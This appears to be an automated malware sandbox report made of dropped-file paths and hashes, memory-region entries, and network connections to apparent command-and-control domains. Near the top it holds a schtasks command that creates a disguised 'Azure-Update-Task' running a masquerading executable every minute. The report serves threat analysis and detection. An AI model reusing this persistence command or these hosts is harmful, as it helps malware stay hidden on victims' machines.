C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 5.252.179.21:80 5.252.179.21 tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 arsaxa.ac.ug udp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 162.159.129.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 www.microsoft.com udp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 crl.microsoft.com udp
N/A 2.22.22.210:80 crl.microsoft.com tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp

Files

memory/1096-61-0x0000000075281000-0x0000000075283000-memory.dmp

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/2028-64-0x0000000000000000-mapping.dmp

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/1164-73-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1340-77-0x000000000044003F-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/1980-74-0x000000000041A684-mapping.dmp

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/1756-85-0x0000000000417A8B-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/2028-89-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1096-88-0x00000000002F0000-0x00000000002F1000-memory.dmp

memory/2028-90-0x0000000000260000-0x0000000000268000-memory.dmp

memory/1980-92-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1164-93-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1980-91-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1756-94-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1756-95-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1340-96-0x0000000000400000-0x0000000000495000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/1164-106-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/1612-111-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/748-115-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1164-113-0x0000000000200000-0x0000000000201000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1612-121-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1612-122-0x0000000000240000-0x000000000025B000-memory.dmp

memory/748-119-0x0000000000A70000-0x0000000000A71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/2032-127-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/2032-130-0x00000000010A0000-0x00000000010A1000-memory.dmp

memory/1160-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/1216-136-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/1160-138-0x00000000005E0000-0x00000000005FB000-memory.dmp

memory/1164-141-0x0000000000340000-0x00000000003A6000-memory.dmp

memory/748-143-0x0000000000A10000-0x0000000000A70000-memory.dmp

memory/1792-144-0x0000000000000000-mapping.dmp

memory/2032-142-0x0000000000960000-0x00000000009C0000-memory.dmp

memory/1160-145-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1164-147-0x00000000048E0000-0x00000000048E1000-memory.dmp

memory/748-146-0x0000000004700000-0x0000000004701000-memory.dmp

memory/2032-148-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

memory/2032-149-0x00000000004C0000-0x00000000004C2000-memory.dmp

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\ProgramData\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\ProgramData\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/1536-159-0x0000000000000000-mapping.dmp

memory/1464-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 7c5c07773030f216ff0409611d2f06d1
SHA1 519eaa1e4e4e7f6b07290c5978168e480e401a28
SHA256 daf376acb49aa0f9236dfbc4e7eb75bdc5ae11304797404ba3a080a4c903f296
SHA512 6ae93065172bd4261e526d1f55ffc900c8c93ec567ff0386237379bd4861f330e3848434b3175f1ed8920300947291f7e01e06156068820a46272e22eaaa55d0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0dc37a4bd816e8134f76f39f9ea7a593
SHA1 8cd1514d97fbd08ffeaf151319ddfd4c7f297fa3
SHA256 cadd24a2521bbe8c686c337769e8b2470c111037613d8b7c91763f9a79a84824
SHA512 f7c13de72653365691d5696fcfe3e2bd29384bdbbab6744a6dce81622f0271a6f06f362393fb8e98b257b07f8e0719b05d835a32d84e46f1bd580c7c4e21bc05

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3169930aeb3b395eee5713475d82cfc4
SHA1 2267bdb7e170930d2152d8b904d666d81bedc4b1
SHA256 92763ece5939daf0affa3157c34c637032f7226095b885106651c42318701897
SHA512 85bd0f24270b0891b7f9d9f4c518e60ff5d20f1407acecd2cef2ad558cfc363331a16c3f53c46387b7b5c204e0a208b745b2cf50c38eac46e00b510209b5398d

\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/1268-168-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/1160-169-0x0000000004600000-0x0000000004621000-memory.dmp

memory/1268-170-0x00000000007E2730-mapping.dmp

memory/1908-172-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/1164-178-0x0000000004A20000-0x0000000004A97000-memory.dmp

memory/748-177-0x0000000004CC0000-0x0000000004D32000-memory.dmp

memory/2052-184-0x00000000004019E4-mapping.dmp

memory/2032-191-0x0000000004D50000-0x0000000004DC2000-memory.dmp

memory/2124-190-0x0000000000000000-mapping.dmp

memory/2108-189-0x0000000000000000-mapping.dmp

memory/2164-193-0x0000000000000000-mapping.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/2032-194-0x0000000000BF0000-0x0000000000C0F000-memory.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/2052-187-0x0000000000400000-0x0000000000405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/2052-182-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2052-181-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2052-180-0x0000000000400000-0x0000000000405000-memory.dmp

\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/1268-176-0x0000000000400000-0x00000000007E4000-memory.dmp

\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/748-199-0x00000000007C0000-0x00000000007E0000-memory.dmp

memory/2192-198-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

